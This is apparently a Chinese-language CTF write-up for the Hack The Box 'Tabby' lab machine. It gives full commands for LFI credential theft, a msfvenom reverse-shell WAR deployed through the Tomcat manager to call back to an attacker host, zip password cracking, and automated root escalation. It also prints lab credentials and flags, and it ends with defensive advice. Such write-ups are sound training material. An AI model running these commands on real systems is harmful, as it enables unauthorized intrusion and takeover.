[Meachines] [Easy] Tabby LFI(pany文件包含漏洞利用工具)+tomcat-Text-based 管理器文件上传+trp00f自动化权限提升工具
字数 1053 2025-08-19 12:41:40

Tabby靶机渗透测试报告:LFI漏洞利用、Tomcat文件上传与自动化提权

1. 信息收集

1.1 端口扫描

使用Nmap进行初始扫描:

nmap -p- 10.10.10.194 --min-rate 1000 -sC -sV

扫描结果:

  • 22/tcp - OpenSSH 8.2p1 Ubuntu 4
  • 80/tcp - Apache httpd 2.4.41 (Ubuntu)
  • 8080/tcp - Apache Tomcat

1.2 Web服务枚举

将目标IP添加到hosts文件:

echo '10.10.10.194 megahosting.htb' >> /etc/hosts

2. 漏洞利用

2.1 LFI漏洞利用

发现news.php存在本地文件包含漏洞,使用pany工具进行利用:

项目地址:

  • https://github.com/MartinxMax/Web-crawlers-get-web-links
  • https://github.com/MartinxMax/pany

执行命令:

python3 pany.py -u 'http://megahosting.htb/news.php?file=*'

通过LFI漏洞获取Tomcat凭据:

username: tomcat
password: $3cureP4s5w0rd123!

2.2 Tomcat管理器利用

2.2.1 目录枚举

使用gobuster枚举Tomcat管理器路径:

gobuster dir -u "http://10.10.10.194:8080/manager" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -b 404,403 -t 50

参考文档:
https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html

2.2.2 部署反向Shell

  1. 生成war格式的反向shell:
msfvenom -p java/shell_reverse_tcp lhost=10.10.16.18 lport=10032 -f war -o reverse.war
  1. 使用curl部署war文件:
curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/rev --upload-file reverse.war
  1. 访问部署的应用触发反向shell:
curl http://10.10.10.194:8080/rev

3. 权限提升

3.1 获取user.txt

通过Tomcat shell获取user.txt:

db89a0405cb8dc95a803de1ed1380033

3.2 切换到ash用户

发现备份文件:

http://megahosting.htb/files/16162020_backup.zip

使用zip2john和john破解密码:

zip2john 16162020_backup.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

获取密码:

admin@it

切换到ash用户:

su ash

3.3 使用trp00f自动化提权

执行trp00f工具进行自动化提权:

python3 trp00f.py --lhost 10.10.16.18 --lport 10022 --rhost 10.10.16.18 --rport 10090 --pkhttpport 10033 --lxhttpport 10091 --password 'admin@it'

获取root.txt:

4403dace3ed0c861a56d5725763cb5ff

4. 关键工具与技术总结

  1. pany工具:用于自动化检测和利用LFI漏洞
  2. Tomcat管理器利用
    • 使用text接口进行应用部署
    • 通过war文件上传获取反向shell
  3. trp00f工具:自动化权限提升工具,简化提权过程
  4. 密码破解流程
    • zip2john提取哈希
    • john进行字典破解

5. 防御建议

  1. 防止LFI漏洞

    • 避免直接使用用户输入作为文件路径
    • 使用白名单限制可访问的文件
    • 禁用危险PHP函数如include、require等

  2. Tomcat安全配置

    • 修改默认管理器路径
    • 使用强密码并定期更换
    • 限制管理界面的访问IP
    • 禁用text接口或启用更严格的认证

  3. 系统安全

    • 定期检查备份文件权限
    • 监控可疑的提权行为
    • 保持系统和应用及时更新
Tabby靶机渗透测试报告:LFI漏洞利用、Tomcat文件上传与自动化提权 1. 信息收集 1.1 端口扫描 使用Nmap进行初始扫描: 扫描结果: 22/tcp - OpenSSH 8.2p1 Ubuntu 4 80/tcp - Apache httpd 2.4.41 (Ubuntu) 8080/tcp - Apache Tomcat 1.2 Web服务枚举 将目标IP添加到hosts文件: 2. 漏洞利用 2.1 LFI漏洞利用 发现 news.php 存在本地文件包含漏洞,使用pany工具进行利用: 项目地址: https://github.com/MartinxMax/Web-crawlers-get-web-links https://github.com/MartinxMax/pany 执行命令: 通过LFI漏洞获取Tomcat凭据: 2.2 Tomcat管理器利用 2.2.1 目录枚举 使用gobuster枚举Tomcat管理器路径: 参考文档: https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html 2.2.2 部署反向Shell 生成war格式的反向shell: 使用curl部署war文件: 访问部署的应用触发反向shell: 3. 权限提升 3.1 获取user.txt 通过Tomcat shell获取user.txt: 3.2 切换到ash用户 发现备份文件: 使用zip2john和john破解密码: 获取密码: 切换到ash用户: 3.3 使用trp00f自动化提权 执行trp00f工具进行自动化提权: 获取root.txt: 4. 关键工具与技术总结 pany工具 :用于自动化检测和利用LFI漏洞 Tomcat管理器利用 : 使用text接口进行应用部署 通过war文件上传获取反向shell trp00f工具 :自动化权限提升工具,简化提权过程 密码破解流程 : zip2john提取哈希 john进行字典破解 5. 防御建议 防止LFI漏洞 : 避免直接使用用户输入作为文件路径 使用白名单限制可访问的文件 禁用危险PHP函数如include、require等 Tomcat安全配置 : 修改默认管理器路径 使用强密码并定期更换 限制管理界面的访问IP 禁用text接口或启用更严格的认证 系统安全 : 定期检查备份文件权限 监控可疑的提权行为 保持系统和应用及时更新